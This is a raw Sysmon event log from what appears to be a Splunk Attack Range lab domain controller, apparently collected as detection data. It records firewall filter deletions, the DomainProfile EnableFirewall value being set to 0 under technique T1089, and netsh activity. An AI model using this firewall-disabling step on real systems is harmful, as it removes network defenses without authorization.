12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{0c41d586-9c19-4e01-9d66-b5b98a97576e} 12241200x80000000000000009304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{dc95b53e-01cf-4058-821d-350b3d0d4676} 12241200x80000000000000009303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{941dad9d-7b1a-4354-997b-00cf1aa9b35c} 12241200x80000000000000009302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{935b7f48-0ede-44dd-9bc2-e00bb635cda3} 12241200x80000000000000009301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{3697a558-3ed3-49be-a4c1-c1a4448653b4} 12241200x80000000000000009300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{b6fdab6b-dcc6-43e3-99ce-7aeca65063a4} 12241200x80000000000000009299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{c42f1cd6-3a95-4ae2-a513-793c3ae610c7} 12241200x80000000000000009298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{2db25e6c-f07a-44f4-b6c8-50a330d2790b} 12241200x80000000000000009297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{375fb39b-08c6-40f2-bdf2-08fa63f970a2} 12241200x80000000000000009296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{2dd96961-5757-434f-b617-34e732517c0e} 12241200x80000000000000009295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{cbfb56db-3c85-4543-9bc2-76ea28cdd74e} 12241200x80000000000000009294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{13bfd422-6f75-4408-8924-9400ec0cb19c} 12241200x80000000000000009293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{64e55933-15a5-495d-a928-ccca43d44875} 12241200x80000000000000009292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{91ffecf0-0a9e-4572-95f1-a7111af86967} 12241200x80000000000000009291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{0ccc96a3-8c5c-45e2-b80e-7e37b16cc1ad} 12241200x80000000000000009290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{a47525e2-725b-4888-8af1-ba5a60c04f4d} 12241200x80000000000000009289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{c016105c-eb34-4519-a5fd-5f4e4ad4d18e} 12241200x80000000000000009288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{074f7f68-ee10-428a-89d1-ba78f6c327ca} 12241200x80000000000000009287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{0aa7fff8-919f-453c-928c-28a12122ba38} 12241200x80000000000000009286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{b6b2ca61-fb98-4422-adc2-e7cf56b3680c} 12241200x80000000000000009285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{5b0cb2e2-ab87-4974-9f1c-2f22a654eeb9} 12241200x80000000000000009284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{07a24961-a760-4e80-b263-6d275e1b09cb} 12241200x80000000000000009283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{1165065e-4996-4338-abaf-4b8556b4d431} 12241200x80000000000000009282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{716b48eb-0a35-4a76-92ab-1d987230d288} 12241200x80000000000000009281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{be7cbdf4-b192-4aa5-94f8-1fb5c5ee07bc} 12241200x80000000000000009280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{4d9581d2-aef8-4993-84cd-b986ced80d42} 12241200x80000000000000009279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{0c3be01b-fe70-4cc4-89dc-c07996b67e6d} 12241200x80000000000000009278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{c970a45d-57f9-4e32-a5bd-886a9662641e} 12241200x80000000000000009277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{12c38916-82ac-4737-8f38-b6957ffebad6} 12241200x80000000000000009276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{0c41d586-9c19-4e01-9d66-b5b98a97576e} 12241200x80000000000000009275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{f444c576-6e60-4ea2-9faa-80d57ed12cd2} 12241200x80000000000000009274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{dc95b53e-01cf-4058-821d-350b3d0d4676} 13241300x80000000000000009273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.318{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 13241300x80000000000000009272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1089SetValue2021-03-31 12:04:39.318{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewallDWORD (0x00000000) 10341000x80000000000000009271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.318{266CAFBE-646C-6064-1600-00000000AE01}15842192C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+6edd7|c:\windows\system32\mpssvc.dll+8bf86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.271{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.271{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.052{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D006D6907771EC75850AE4CB209541A5,SHA256=EFD8F57C69405F3FB7C7BBAD129280C370B7402190A0EA9A88085F00AEF7DCC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:40.098{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=771D09D7BDBD47853EAE006734E39CF5,SHA256=74EEF712CE8B53776A2D87A7603F8963685DEA5897BC8E2BD217C5507FACDBC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:40.541{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53630-false10.0.1.12-8000- 23542300x80000000000000009472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:41.159{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0023D3784FC542C306363A25421DC9E,SHA256=C24154A606D1D67D88F4A21506555907447AD38E98C1239399C56DA29A9D7962,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:42.190{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF0D179E3C4E6109C99478754FFAD8D,SHA256=107608B74E3522D242EDDA063A862C855E3FCFC59DB060283BED44C73D600135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:43.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E692DCF69DAD6948886E1B331F26B8BE,SHA256=17BA1AC98E1F6355E51F3C023E2582D7E2A86335C7D35C9389AD59D7817B3417,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.734{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 25542500x80000000000000009485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-655C-6064-4201-00000000AE01}6936C:\Windows\System32\wbem\WMIADAP.exeImage is locked for access 10341000x80000000000000009484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\wbem\wmisvc.dll+2624|c:\windows\system32\wbem\wmisvc.dll+2491|C:\Windows\SYSTEM32\ntdll.dll+7dc0d|C:\Windows\SYSTEM32\ntdll.dll+3aa09|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000009478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.484{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x80000000000000009477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.484{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=796CCCD25221B094BDCE6B7E8C0F1393,SHA256=3A62F437824CCBEADD195DB98EC751EC718FD0BC2AC7A0B889FF0A7238E68B8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.219{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A980A8A7ED2E54D70BFADA9A160D9085,SHA256=4A3ABE17407BEB62FA63BE92283E4F4C0ED82D1E98A2B4B30837A19E1ADC1FCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:45.234{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F86F52C9357D538B962A80D9C1FCDFB,SHA256=834BE4ABD0D2B8D4E4A3C0627ED7BBC2F5DD085E12F9C7AFE5CD3FE5439BEB5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 